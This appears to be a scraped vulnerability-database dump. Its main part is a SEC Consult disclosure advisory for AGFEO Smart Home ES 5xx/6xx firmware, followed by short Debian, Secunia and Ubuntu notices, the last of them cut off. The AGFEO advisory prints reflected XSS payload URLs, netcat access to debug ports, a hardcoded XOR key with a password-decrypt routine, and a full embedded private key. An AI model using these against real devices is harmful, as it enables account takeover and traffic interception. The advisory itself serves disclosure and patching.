NbcX3Q68A5sGMpc9sgPQSyTCm\r\nWxgyYC9wPviKdj2MqUpn9DAbRz0zbkDi5yyT1p+bW7sLY35Oj5Bb6Op4zY7wV7vs\r\nvVStyQHkMRCqUs7xI9hoepFSm/ySe2ZZQ6+pMi2dbQKBgQCn9FdGZzWOAIXrfj7Q\r\nSoMEUPEIEdxXYEy8Rudh9VVIJQW4tvYX6mQMr8fgx5RKRaTsL1Qv/tn9XGq00wes\r\n3NuLEq2urJAC7z8smqkvWm2xo91j+ExeRL66CfPdm5KPyaCXcuFysz5/LUKxG/a3\r\n+K62TQB1mEb1t9WQsxJYGcUiyg==\r\n-----END PRIVATE KEY-----\r\n\r\n\r\n4) Multiple reflected cross site scripting (XSS) vulnerabilities\r\nThe following crafted requests can be used to trigger the cross site scripting\r\nvulnerability at different entry points:\r\nhttp://<Device-IP>:20011/ais.php/%22%3E%3Cscript%3Ealert%28'XSS'%29%3C%2fscript%3E\r\nhttp://<Device-IP>:20011/xtopbxwav.php/%22%3E%3Cscript%3Ealert%28'XSS'%29%3C%2fscript%3E\r\nhttp://<Device-IP>:20011/update.php/%22%3E%3Cscript%3Ealert%28'XSS'%29%3C%2fscript%3E\r\nhttp://<Device-IP>/pbxapi/licence.php/%3Cimg%20src=x%20onerror=alert%28'XSS'%29%3E\r\nhttp://<Device-IP>/pbxapi/eoimport.php/%3Cimg%20src=x%20onerror=alert%28'XSS'%29%3E\r\nhttp://<Device-IP>/pbxapi/knximport.php/%3Cimg%20src=x%20onerror=alert%28'XSS'%29%3E\r\nhttp://<Device-IP>/pbxapi/hmimport.php/%3Cimg%20src=x%20onerror=alert%28'XSS'%29%3E\r\n\r\n\r\nVulnerable / tested versions:\r\n-----------------------------\r\nOne firmware is available for the whole ES 5 product line, and another one for\r\nthe product line ES 6. Therefore, all vulnerabilities which have been found in\r\none product of ES 5/6 are also available in all other products of ES 5/6.\r\n\r\nThe following product / firmware version has been tested by SEC Consult:\r\nES 512 Version 1.9b (es5xxv19b_c063be6)\r\nES 512 Version 1.10 (es5xxv110_f105485)\r\n\r\nBased on results of the SEC Technologies IoT Inspector\r\n(http://www.iot-inspector.com/ - automated firmware analysis tool) we believe\r\nthat the product line ES 6 is also prone to the identified vulnerabilities\r\n(except the web service on port 20011) as well as product line ES 5.\r\n\r\nFirmware Version 1.9b (ES6xxv19b_c063be67b9c2ba)\r\nFirmware Version 1.10 (ES6xxv110_f105485715a360)\n\n# 0day.today [2018-03-20] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/28123"}], "packetstorm": [{"lastseen": "2017-07-12T17:44:57", "description": "", "published": "2017-07-12T00:00:00", "type": "packetstorm", "title": "AGFEO Smart Home ES 5xx / 6xx Authentication Bypass / XSS / Hardcoded Credentials", "bulletinFamily": "exploit", "cvelist": [], "modified": "2017-07-12T00:00:00", "id": "PACKETSTORM:143338", "href": "https://packetstormsecurity.com/files/143338/AGFEO-Smart-Home-ES-5xx-6xx-Authentication-Bypass-XSS-Hardcoded-Credentials.html", "sourceData": "`SEC Consult Vulnerability Lab Security Advisory < 20170712-0 > \n======================================================================= \ntitle: Multiple critical vulnerabilities \nproduct: AGFEO Smart Home ES 5xx \nAGFEO Smart Home ES 6xx \nvulnerable version: at least 1.9b, 1.10 \nfixed version: 1.12c \nCVE number: - \nimpact: Critical \nhomepage: https://www.agfeo.de/ \nfound: 2016-12-28 \nby: T. Weber (Office Vienna) \nSEC Consult Vulnerability Lab \n \nAn integrated part of SEC Consult \nBangkok - Berlin - Linz - Luxembourg - Montreal - Moscow \nKuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich \n \nhttps://www.sec-consult.com \n \n======================================================================= \n \nVendor description: \n------------------- \nAGFEO GmbH & Co. KG is a vendor of telephone systems and other \n(tele-)communication products like DECT phones, headsets or smart home \nproducts as well. \n \n \nBusiness recommendation: \n------------------------ \nThe available patches should be installed immediately. \n \nSEC Consult recommends not to use this product in a production environment \nuntil a thorough security review has been performed by security professionals \nas there are indications for further security issues. \n \n \nVulnerability overview/description: \n----------------------------------- \n1) Unauthenticated access to web services and authentication bypass \nA web service with multiple scripts for debug purposes is accessible \non an unusual port on the device. There is also a script to read files from \nthe filesystem. As the web service runs with root privileges all files \non the operating system can be read by an attacker. This only affects the \nES 5xx product line, all other vulnerabilities affect both ES 5xx and 6xx. \n \nThe configuration of the device can be changed and arbitrary updates can be \nuploaded as well as music files for the answering machine. By reading the \ndatabase content, the usernames and their passwords can be revealed and easily \ndecrypted. This way the administrator password can be dumped from the database \nand the device can be fully administrated by an attacker. \nThe normal user interface has an additional development subfolder which was \nprobably used during the development process. Updates can be triggered from \nthis sub platform and log files, statistics and states can also be displayed. \n \n \n2) Unauthenticated access to configuration ports \nMultiple different instances of TCP services are present on the device. Each \nof the listening sockets is forked from a debug and configuration service. \nInternal device information can be read from the device. Among other commands, \nthe configuration of the device can also be altered by using these services. \n \n \n3) Hardcoded cryptographic keys \nThree certificates including their private keys are embedded in the firmware \nof AGFEO ES 5xx/6xx SmartHome products. The certificates and keys in both \nproduct lines are exactly the same. One certificate is used for HTTPS \n(default server certificate for web based configuration and management). \n \nImpersonation, man-in-the-middle or passive decryption attacks are possible. \nThese attacks allow an attacker to gain access to sensitive information like \nadmin credentials and use them in further attacks. \n \n \n4) Multiple reflected cross site scripting (XSS) vulnerabilities \nThe ES 5xx SmartHome products are vulnerable to reflected cross site scripting. \nMalicious JavaScript code can be executed in the browser of a victim by luring \nto a handcrafted link. This is possible even if the victim is not logged in. \nIt is assumed that the 6xx products are affected as well but those could not be \ntested. \n \n \nProof of concept: \n----------------- \n1) Unauthenticated access to web services and authentication bypass \nThe debug web service is available by using the following url: \nhttp://<Device-IP>:20011/index.html \nThere are different scripts accessible, the following actions can be executed: \n-) Change IP configuration \n-) Change time zone \n-) Upload updates (Any files can be uploaded to the device!) \n-) Read all files on the filesystem \n-) Play, delete and move voice messages on all mail boxes \n-) Converting mp3 files to wav files \n-) List all connected phones and the related numbers \n \nThe SQLite database is located under \"/home/profile/poolstore.db\". By reading \nthis file the usernames and passwords can be dumped. The passwords are encoded \nwith base64 and encrypted with XOR. To decrypt the XOR'ed password the \nfollowing key has to be used: \n\"0x42 0xab 0xce 0xfa 0x54 0xed 0xcf 0xba\" \n \nThe function to decrypt the password was found in the php script \"login.php\": \nfunction decodePassword($PasswordEnc) \n{ \n$PasswordBinaryEncBase64 = \"\"; \n$PasswordBinaryEnc=\"\"; \n$PasswordBinary = array(); \n$Password = \"\"; \n$lastChar=0; \n \n$Key=array(0x42, 0xab, 0xce, 0xfa, 0x54, 0xed, 0xcf, 0xba); \n \n$PasswordBinaryEncBase64 = $PasswordEnc; \n \n// base64 decode \n$PasswordBinaryEnc = base64_decode($PasswordBinaryEncBase64); \n \n// xor decode \nfor($i=0; $i<strlen($PasswordBinaryEnc); $i++) { \n$PasswordBinary[$i] = ord($PasswordBinaryEnc[$i]) ^ $Key[$i % count($Key)] \n^ $lastChar; \n$lastChar = ord($PasswordBinaryEnc[$i]); \n} \n \n// erstes Zeichen entfernen (random char!) \nforeach ($PasswordBinary as $chr) { \n$Password .= chr($chr); \n} \n$Password = substr($Password, 1); \n// printf(\"%s:%d Password %s\\n\", __FUNCTION__, __LINE__, $Password); \nreturn $Password; \n} \n \nAn additional subfolder, which contains debug scripts, is available under the \nfollowing location: \nhttp://<Device-IP>/shdev/ui9.php \n \nUpdates can be triggered, logs can be shown and status messages can be gathered \nwithin this functionality. Furthermore, it is possible to debug the login \nprocess. Since there is a hardcoded user \"admin\" a brute force attack is also \npossible. \n \n \n2) Unauthenticated access to configuration ports \nThe following TCP ports can be accessed with \"nc <Device-IP> -p <Port>\": \n19002, 19004, 19006, 19009, 19010, 19080, 19081 \nBy connecting to one of these ports a debug interface spawns. For example the \nconnection to port 19081: \n$ nc 192.168.0.40 19081 \nStart Menue: <Return> \n========< UPDS - Menue >======== \ns: show state \nh: help \nD: DEBmod on \nd: DEBmod off \nL: LOG on \nl: LOG off \nS: SERVICE-SUBMENUE \nq: Quit telnet session \n========= NOT AKTIV =========== \ns \nstatus ausgeben (noch nicht vollstaendig implementiert) \nupds <Timestamp> bState: 00 \nupds <Timestamp> bLastReceiveBlockNum: 15 \n[...] \nS \nupds <Timestamp> \nupds <Timestamp> ===== service-menue ====================== \nupds <Timestamp> help help \nupds <Timestamp> q quit \nupds <Timestamp> D dial \nupds <Timestamp> d disconnect \nupds <Timestamp> ============ NOT AKTIV =================== \nservice submenue \n \n \n3) Hardcoded cryptographic keys \nRefer to our study on hardcoded cryptographic secrets in embedded systems for \nfurther information. \nhttp://blog.sec-consult.com/2016/09/house-of-keys-9-months-later-40-worse.html \nIoT Inspector (http://www.iot-inspector.com/) was used to identify this \nvulnerability. \n \nOpenSSL output for the certificate: \nCertificate: \nData: \nVersion: 1 (0x0) \nSerial Number: 10293758115057549292 (0x8edac6778bccbfec) \nSignature Algorithm: sha256WithRSAEncryption \nIssuer: C=DE, ST=Some-State, L=Bielefeld, O=AGFEO GmbH & Co. KG, OU=Dev, \nCN=info/emailAddress=info@agfeo.de \nValidity \nNot Before: Oct 21 14:03:55 2014 GMT \nNot After : Mar 8 14:03:55 2042 GMT \nSubject: C=DE, ST=Some-State, L=Bielefeld, O=AGFEO GmbH & Co. KG, OU=Dev, \nCN=info/emailAddress=info@agfeo.de \nSubject Public Key Info: \nPublic Key Algorithm: rsaEncryption \nPublic-Key: (2048 bit) \nModulus: \n00:be:79:ad:17:e8:c7:9e:63:b3:bb:67:ce:bd:79: \n29:66:22:ce:63:99:6a:a5:31:f4:70:5f:3f:9d:11: \n94:d6:65:8c:4e:43:6b:e4:d4:f1:f4:bd:81:4c:72: \n67:50:10:09:b8:60:b3:cd:be:23:ce:9a:75:ec:e4: \n7a:cf:3a:e2:f0:51:f9:a5:f3:c5:67:5d:01:e9:72: \n68:b1:59:f5:5b:d8:dc:3e:1d:00:df:06:a6:07:06: \n12:70:c7:97:05:a5:da:80:14:2c:c7:ae:6a:ef:a1: \n1a:b8:f8:6b:71:5e:91:04:da:43:ba:cf:7c:ef:bd: \n01:b7:15:a1:7b:8f:52:21:06:ad:48:b4:57:0c:b2: \nac:b2:14:fe:30:38:96:5e:28:b8:68:b2:d3:ee:8d: \n28:3c:ac:a0:95:c8:07:39:b7:df:95:6d:88:a2:12: \n77:31:a8:55:f6:ab:c7:17:16:03:5f:ca:f2:ca:8f: \nfd:37:65:2c:b0:aa:47:59:fe:d6:ec:69:8f:db:b6: \n9e:93:4b:f0:87:77:90:f6:5c:e4:64:d1:96:99:d5: \nd8:37:e4:7d:2f:bd:f4:04:fd:67:13:bc:68:ea:e6: \n00:dd:72:74:a2:fe:1a:00:27:8b:b8:96:a6:0c:93: \n82:52:6d:61:2c:62:02:b2:e8:ab:45:e4:87:98:d2: \nba:57 \nExponent: 65537 (0x10001) \nSignature Algorithm: sha256WithRSAEncryption \n37:12:cb:94:9a:51:f8:9a:04:9f:60:19:6a:12:23:38:10:85: \nb5:79:2b:49:5d:b6:65:82:76:c0:0b:20:d1:bf:04:ce:46:38: \n56:ea:0b:2e:41:f5:61:d1:12:d4:ce:34:d9:e3:2a:bb:e8:9f: \nf1:0e:0d:da:37:91:ee:92:dd:9a:85:91:14:a2:21:87:da:52: \n33:d6:ec:74:c0:3a:46:7f:82:02:91:75:99:ad:fd:72:1b:ec: \n00:64:10:e1:9c:81:3b:c9:8e:6b:73:d5:e1:df:7b:60:d4:b6: \n08:51:30:25:b1:a0:ed:f0:de:2e:15:33:c2:bf:c3:fe:69:1b: \na8:26:c3:25:f0:53:8e:1f:8a:aa:44:f4:59:88:5b:7d:27:d6: \na5:a9:e8:26:a9:ba:75:f0:84:5d:e0:e7:03:75:a0:a6:64:c4: \n16:ce:88:16:ca:72:f2:43:7a:08:b5:e3:48:d7:c3:a1:3a:28: \n43:3c:5a:30:d4:31:dc:68:a5:5c:da:7c:20:7b:ee:e6:a2:04: \na3:3e:f1:5d:39:f4:89:d7:f0:f3:b4:e6:5e:81:cd:60:34:61: \nef:e1:d8:59:f9:d0:5a:11:af:53:03:93:4a:9e:fb:1e:a3:8b: \n94:90:de:59:91:59:ff:f3:1b:5a:ef:7f:aa:33:c2:47:50:05: \n0a:bc:62:3c \n \nCertificate: \n-----BEGIN CERTIFICATE----- \nMIIDnDCCAoQCCQCO2sZ3i8y/7DANBgkqhkiG9w0BAQsFADCBjzELMAkGA1UEBhMC \nREUxEzARBgNVBAgMClNvbWUtU3RhdGUxEjAQBgNVBAcMCUJpZWxlZmVsZDEcMBoG \nA1UECgwTQUdGRU8gR21iSCAmIENvLiBLRzEMMAoGA1UECwwDRGV2MQ0wCwYDVQQD \nDARpbmZvMRwwGgYJKoZIhvcNAQkBFg1pbmZvQGFnZmVvLmRlMB4XDTE0MTAyMTE0 \nMDM1NVoXDTQyMDMwODE0MDM1NVowgY8xCzAJBgNVBAYTAkRFMRMwEQYDVQQIDApT \nb21lLVN0YXRlMRIwEAYDVQQHDAlCaWVsZWZlbGQxHDAaBgNVBAoME0FHRkVPIEdt \nYkggJiBDby4gS0cxDDAKBgNVBAsMA0RldjENMAsGA1UEAwwEaW5mbzEcMBoGCSqG \nSIb3DQEJARYNaW5mb0BhZ2Zlby5kZTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCC \nAQoCggEBAL55rRfox55js7tnzr15KWYizmOZaqUx9HBfP50RlNZljE5Da+TU8fS9 \ngUxyZ1AQCbhgs82+I86adezkes864vBR+aXzxWddAelyaLFZ9VvY3D4dAN8GpgcG \nEnDHlwWl2oAULMeuau+hGrj4a3FekQTaQ7rPfO+9AbcVoXuPUiEGrUi0VwyyrLIU \n/jA4ll4ouGiy0+6NKDysoJXIBzm335VtiKISdzGoVfarxxcWA1/K8sqP/TdlLLCq \nR1n+1uxpj9u2npNL8Id3kPZc5GTRlpnV2DfkfS+99AT9ZxO8aOrmAN1ydKL+GgAn \ni7iWpgyTglJtYSxiArLoq0Xkh5jSulcCAwEAATANBgkqhkiG9w0BAQsFAAOCAQEA \nNxLLlJpR+JoEn2AZahIjOBCFtXkrSV22ZYJ2wAsg0b8EzkY4VuoLLkH1YdES1M40 \n2eMqu+if8Q4N2jeR7pLdmoWRFKIhh9pSM9bsdMA6Rn+CApF1ma39chvsAGQQ4ZyB \nO8mOa3PV4d97YNS2CFEwJbGg7fDeLhUzwr/D/mkbqCbDJfBTjh+KqkT0WYhbfSfW \npanoJqm6dfCEXeDnA3WgpmTEFs6IFspy8kN6CLXjSNfDoTooQzxaMNQx3GilXNp8 \nIHvu5qIEoz7xXTn0idfw87TmXoHNYDRh7+HYWfnQWhGvUwOTSp77HqOLlJDeWZFZ \n//MbWu9/qjPCR1AFCrxiPA== \n-----END CERTIFICATE----- \n \nPrivate Key: \n-----BEGIN PRIVATE KEY----- \nMIIEvwIBADANBgkqhkiG9w0BAQEFAASCBKkwggSlAgEAAoIBAQC+ea0X6MeeY7O7 \nZ869eSlmIs5jmWqlMfRwXz+dEZTWZYxOQ2vk1PH0vYFMcmdQEAm4YLPNviPOmnXs \n5HrPOuLwUfml88VnXQHpcmixWfVb2Nw+HQDfBqYHBhJwx5cFpdqAFCzHrmrvoRq4 \n+GtxXpEE2kO6z3zvvQG3FaF7j1IhBq1ItFcMsqyyFP4wOJZeKLhostPujSg8rKCV \nyAc5t9+VbYiiEncxqFX2q8cXFgNfyvLKj/03ZSywqkdZ/tbsaY/btp6TS/CHd5D2 \nXORk0ZaZ1dg35H0vvfQE/WcTvGjq5gDdcnSi/hoAJ4u4lqYMk4JSbWEsYgKy6KtF \n5IeY0rpXAgMBAAECggEAI7joKJrEjUT/mT8Pu+M0S25trKpCIPcsc8K5SHjapBbp \naGgmnQT+17qOvEqca5yGZijkr8pgJsg7I5F6ItFVbGLDYkdEl20PBbwqPFC1vmL+ \nczu3RRyXGKwf2zzjavC++NRPzac9cPGS9GvKorlsky9oEmoFcWTOJIsO/QBVE9I8 \nhPc5utxQQ5WTDfUD84Y2ELJx/qhZNB8gOF+KhDQT0slE1/7Y7sHMi++kxVj+KiVb \nKif3DxpB6reMP5s1zhmfJcF9pPrr6jT35OuEjQ15y9p9wrLL1txfJbi3O6Ucwd3q \nINHugNN/v+/6ia06aZtknxYoG+hFS7PbulU11VSimQKBgQDzoQRtO0MjEo3Gucqi \niaxpueYsAizJx9GkdCh7StN8ZWADpZj6x7B6vIhjXZO6Q5bM6j838lYWyNYsBHpq \nFXeAM8cPIm7xUpRQDLKfhU9YA9/6iQ8/dzTYR49uj67syc9HH9dIOsRyVAy2ci6S \nUySE3aTSCJCwSerpFZWoPqsbOwKBgQDIJbQQg+QnAOdTYdmIQv8zW6nLvuwLzNkP \nwxFlZ/78DI8+2h1H5LGd/2C2ybKIsif/pU5u721qkqxIrIc1I3BWcX+O+QwiJ1oO \nSBeA3gzcD7IOpW2GqyN8tt8cWo48moDjIcSYGB6mSd0WmX7MfsOxnEybLWQIKHD4 \nsTclSDuTlQKBgQDZyRGk97oPazGT+Vf8LmgS5xysMJGLG3X7td7OQFiHtjO7btgv \nLj1Dqq+da/R4KJ1wtuImiBqPKZ/TH3myxVfbIe4LSHO2hGSSnpc65LfF7UjWtJkN \n2elCgc3lPspXYBxL71nKdsZPkXT/z1h0c6CMqXoCS6fT/2/gRuxOxx68KwKBgQCo \nSEM465wmSzU0v34GesZWKUj/nXycg1UyUoJK8ADNbcX3Q68A5sGMpc9sgPQSyTCm \nWxgyYC9wPviKdj2MqUpn9DAbRz0zbkDi5yyT1p+bW7sLY35Oj5Bb6Op4zY7wV7vs \nvVStyQHkMRCqUs7xI9hoepFSm/ySe2ZZQ6+pMi2dbQKBgQCn9FdGZzWOAIXrfj7Q \nSoMEUPEIEdxXYEy8Rudh9VVIJQW4tvYX6mQMr8fgx5RKRaTsL1Qv/tn9XGq00wes \n3NuLEq2urJAC7z8smqkvWm2xo91j+ExeRL66CfPdm5KPyaCXcuFysz5/LUKxG/a3 \n+K62TQB1mEb1t9WQsxJYGcUiyg== \n-----END PRIVATE KEY----- \n \n \n4) Multiple reflected cross site scripting (XSS) vulnerabilities \nThe following crafted requests can be used to trigger the cross site scripting \nvulnerability at different entry points: \nhttp://<Device-IP>:20011/ais.php/%22%3E%3Cscript%3Ealert%28'XSS'%29%3C%2fscript%3E \nhttp://<Device-IP>:20011/xtopbxwav.php/%22%3E%3Cscript%3Ealert%28'XSS'%29%3C%2fscript%3E \nhttp://<Device-IP>:20011/update.php/%22%3E%3Cscript%3Ealert%28'XSS'%29%3C%2fscript%3E \nhttp://<Device-IP>/pbxapi/licence.php/%3Cimg%20src=x%20onerror=alert%28'XSS'%29%3E \nhttp://<Device-IP>/pbxapi/eoimport.php/%3Cimg%20src=x%20onerror=alert%28'XSS'%29%3E \nhttp://<Device-IP>/pbxapi/knximport.php/%3Cimg%20src=x%20onerror=alert%28'XSS'%29%3E \nhttp://<Device-IP>/pbxapi/hmimport.php/%3Cimg%20src=x%20onerror=alert%28'XSS'%29%3E \n \n \nVulnerable / tested versions: \n----------------------------- \nOne firmware is available for the whole ES 5 product line, and another one for \nthe product line ES 6. Therefore, all vulnerabilities which have been found in \none product of ES 5/6 are also available in all other products of ES 5/6. \n \nThe following product / firmware version has been tested by SEC Consult: \nES 512 Version 1.9b (es5xxv19b_c063be6) \nES 512 Version 1.10 (es5xxv110_f105485) \n \nBased on results of the SEC Technologies IoT Inspector \n(http://www.iot-inspector.com/ - automated firmware analysis tool) we believe \nthat the product line ES 6 is also prone to the identified vulnerabilities \n(except the web service on port 20011) as well as product line ES 5. \n \nFirmware Version 1.9b (ES6xxv19b_c063be67b9c2ba) \nFirmware Version 1.10 (ES6xxv110_f105485715a360) \n \n \nVendor contact timeline: \n------------------------ \n2017-01-10: Contacting vendor through info@agfeo.de and set release date \nto 2017-03-01 according to SEC Consult responsible disclosure \npolicy. \n2017-01-12: Contact asks for getting the security advisory unencrypted. \nSending security advisory unencrypted. \n2017-01-17: Call with vendor. Vendor is working on a fix of the found \nvulnerabilities. \n2017-02-06: Asking for status update via mail; Contact responds that \nmost of the vulnerabilities are fixed and a new version will \nbe available soon. \n2017-02-22: Asking for status update via mail. Contact responds that \na new firmware is available soon. \n2017-02-24: New firmware version is 1.12 for ES 5/6 series. \n2017-02-28: The firmware will be available in CW11. Shifting release of \nadvisory to 2017-03-15. \n2017-03-13: Asked for a status update. \n2017-03-14: Vendor responds that the update will be available on \n2017-03-21. Shifted release to 2017-03-21. \n2017-03-20: Asked vendor when the updated firmware is available as \ndownload; Vendor responds that the updated firmware which \ncontains fixes for all vulnerabilities can be received after \ncontacting their Hotline. They also stated that the update \nwill be available on the homepage in the next few days. \nInformed the vendor that the advisory will be published \nwhen the update is available on the homepage in the next \nfew days. Shifted release to CW14. \n2017-04-05: Asked for status update. Vendor responds that firmware will \nbe available next week. Shifted release to unknown. \n2017-04-24: Asked whether the download is available or not. Firmware \nwill be available next week. \n2017-04-25: Found new version 1.12a for ES 6xx on vendor home page. \n2017-05-26: Found new version 1.11a for ES 5xx on vendor home page. \n2017-05-29: Asked whether the current firmware contains all the fixes. \nVendor responds that only a part of the vulnerabilities \nis fixed. They also state that v1.12b is for all products \nexcept \"ES5xx up\" will be available this week. This \nfirmware contains all fixes. \n2017-06-06: Asked vendor for the actual state, because the contact said \nthat all vulnerabilities are fixed and the firmware can be \nreceived after calling the hotline. Asked vendor which \nvulnerabilities are actually fixed; No answer. \n2017-06-14: Informed vendor that the advisory will be published on \n2017-07-12 because of the long \"ping-pong\" game without \nreal outcome. \n2017-06-22: Contact stated that version 1.12c will be available next \nweek. \n2017-07-03: Found new version 1.12c for ES 5/6/7 on vendor home page \n(available since 2017-06-30). \n2017-07-12: Coordinated release of security advisory. \n \n \nSolution: \n--------- \nCall AGFEO hotline (+49 521 44709-0) or log in to the vendor home page \nto get the newest firmware version. \n \n \nWorkaround: \n----------- \nNone \n \n \nAdvisory URL: \n------------- \nhttps://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm \n \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nSEC Consult Vulnerability Lab \n \nSEC Consult \nBangkok - Berlin - Linz - Luxembourg - Montreal - Moscow \nKuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich \n \nAbout SEC Consult Vulnerability Lab \nThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It \nensures the continued knowledge gain of SEC Consult in the field of network \nand application security to stay ahead of the attacker. The SEC Consult \nVulnerability Lab supports high-quality penetration testing and the evaluation \nof new offensive and defensive technologies for our customers. Hence our \ncustomers obtain the most current information about vulnerabilities and valid \nrecommendation about the risk profile of new technologies. \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \nInterested to work with the experts of SEC Consult? \nSend us your application https://www.sec-consult.com/en/Career.htm \n \nInterested in improving your cyber security with the experts of SEC Consult? \nContact our local offices https://www.sec-consult.com/en/About/Contact.htm \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nMail: research at sec-consult dot com \nWeb: https://www.sec-consult.com \nBlog: http://blog.sec-consult.com \nTwitter: https://twitter.com/sec_consult \n \nEOF T. Weber / @2017 \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/143338/SA-20170712-0.txt"}], "debian": [{"lastseen": "2019-05-30T02:21:58", "bulletinFamily": "unix", "cvelist": ["CVE-2017-10807"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3902-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nJuly 05, 2017 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : jabberd2\nCVE ID : CVE-2017-10807\nDebian Bug : 867032\n\nIt was discovered that jabberd2, a Jabber instant messenger server,\nallowed anonymous SASL connections, even if disabled in the\nconfiguration.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 2.4.0-3+deb9u1.\n\nWe recommend that you upgrade your jabberd2 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 2, "modified": "2017-07-05T19:49:40", "published": "2017-07-05T19:49:40", "id": "DEBIAN:DSA-3902-1:19004", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2017/msg00163.html", "title": "[SECURITY] [DSA 3902-1] jabberd2 security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4878", "CVE-2015-4877"], "description": "\r\n\r\n======================================================================\r\n\r\n Secunia Research (now part of Flexera Software) 26/10/2015\r\n\r\n Oracle Outside In Two Buffer Overflow Vulnerabilities\r\n\r\n======================================================================\r\nTable of Contents\r\n\r\nAffected Software....................................................1\r\nSeverity.............................................................2\r\nDescription of Vulnerabilities.......................................3\r\nSolution.............................................................4\r\nTime Table...........................................................5\r\nCredits..............................................................6\r\nReferences...........................................................7\r\nAbout Secunia........................................................8\r\nVerification.........................................................9\r\n\r\n======================================================================\r\n\r\n1) Affected Software\r\n\r\n* Oracle Outside In versions 8.5.0, 8.5.1, and 8.5.2.\r\n\r\n====================================================================== \r\n2) Severity\r\n\r\nRating: Moderately critical\r\nImpact: System Access\r\nWhere: From remote\r\n\r\n====================================================================== \r\n3) Description of Vulnerabilities\r\n\r\nSecunia Research has discovered two vulnerabilities in Oracle Outside\r\nIn Technology, which can be exploited by malicious people to cause a\r\nDoS (Denial of Service) and compromise an application using the SDK.\r\n\r\n1) An error in the vstga.dll when processing TGA files can be\r\nexploited to cause an out-of-bounds write memory access.\r\n\r\n2) An error in the libxwd2.dll when processing XWD files can be\r\nexploited to cause a stack-based buffer overflow.\r\n\r\nSuccessful exploitation of the vulnerabilities may allow execution of\r\narbitrary code.\r\n\r\n====================================================================== \r\n4) Solution\r\n\r\nApply update. Please see the Oracle Critical Patch Update Advisory\r\nfor October 2015 for details.\r\n\r\n====================================================================== \r\n5) Time Table\r\n\r\n14/07/2015 - Vendor notified of vulnerabilities.\r\n14/07/2015 - Vendor acknowledges report.\r\n16/07/2015 - Vendor supplied bug ticket ID.\r\n27/07/2015 - Vendor supplied information of fix in main codeline.\r\n24/09/2015 - Replied to vendor and asked about CVE references.\r\n25/09/2015 - Vendor replied that they check our request.\r\n27/09/2015 - Vendor assigned two CVE references.\r\n17/10/2015 - Vendor supplied 20/10/2015 as estimated fix date.\r\n20/10/2015 - Release of vendor patch.\r\n21/10/2015 - Public disclosure.\r\n26/10/2015 - Publication of research advisory.\r\n\r\n======================================================================\r\n\r\n6) Credits\r\n\r\nDiscovered by Behzad Najjarpour Jabbari, Secunia Research (now part\r\nof Flexera Software).\r\n\r\n======================================================================\r\n\r\n7) References\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned\r\nthe CVE-2015-4877 and CVE-2015-4878 identifiers for the\r\nvulnerabilities.\r\n\r\n======================================================================\r\n\r\n8) About Secunia (now part of Flexera Software)\r\n\r\nIn September 2015, Secunia has been acquired by Flexera Software:\r\n\r\nhttps://secunia.com/blog/435/\r\n\r\nSecunia offers vulnerability management solutions to corporate\r\ncustomers with verified and reliable vulnerability intelligence\r\nrelevant to their specific system configuration:\r\n\r\nhttp://secunia.com/advisories/business_solutions/\r\n\r\nSecunia also provides a publicly accessible and comprehensive advisory\r\ndatabase as a service to the security community and private\r\nindividuals, who are interested in or concerned about IT-security.\r\n\r\nhttp://secunia.com/advisories/\r\n\r\nSecunia believes that it is important to support the community and to\r\ndo active vulnerability research in order to aid improving the\r\nsecurity and reliability of software in general:\r\n\r\nhttp://secunia.com/secunia_research/\r\n\r\nSecunia regularly hires new skilled team members. Check the URL below\r\nto see currently vacant positions:\r\n\r\nhttp://secunia.com/corporate/jobs/\r\n\r\nSecunia offers a FREE mailing list called Secunia Security Advisories:\r\n\r\nhttp://secunia.com/advisories/mailing_lists/\r\n\r\n======================================================================\r\n\r\n9) Verification \r\n\r\nPlease verify this advisory by visiting the Secunia website:\r\nhttp://secunia.com/secunia_research/2015-04/\r\n\r\nComplete list of vulnerability reports published by Secunia Research:\r\nhttp://secunia.com/secunia_research/\r\n\r\n======================================================================\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32659", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32659", "title": "Secunia Research: Oracle Outside In Two Buffer Overflow Vulnerabilities", "type": "securityvulns", "cvss": {"score": 1.5, "vector": "AV:LOCAL/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-1341"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2782-1\r\nOctober 27, 2015\r\n\r\napport vulnerability\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\nApport could be made to run programs as an administrator.\r\n\r\nSoftware Description:\r\n- apport: automatically generate crash reports for 